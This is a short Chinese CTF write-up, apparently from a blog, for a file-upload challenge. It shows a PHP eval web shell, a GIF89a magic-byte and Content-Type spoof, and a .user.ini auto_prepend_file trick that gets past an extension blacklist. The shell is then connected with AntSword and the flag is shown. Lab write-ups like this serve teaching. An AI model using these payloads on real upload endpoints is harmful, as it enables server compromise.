CTF之easyupload

 

 拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

 

 

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

 

 但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

 然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

 

 

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-15 12:06:03       67 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-15 12:06:03       72 阅读
  3. 在Django里面运行非项目文件

    2024-07-15 12:06:03       58 阅读
  4. Python语言-面向对象

    2024-07-15 12:06:03       69 阅读

热门阅读

  1. Windows中配置Python 3.11环境安装教程

    2024-07-15 12:06:03       27 阅读
  2. 前端热门面试问题(五)

    2024-07-15 12:06:03       23 阅读
  3. 解决PyCharm中的文件格式关联错误:终极指南

    2024-07-15 12:06:03       19 阅读
  4. matplotlib实现RGB图像展示

    2024-07-15 12:06:03       22 阅读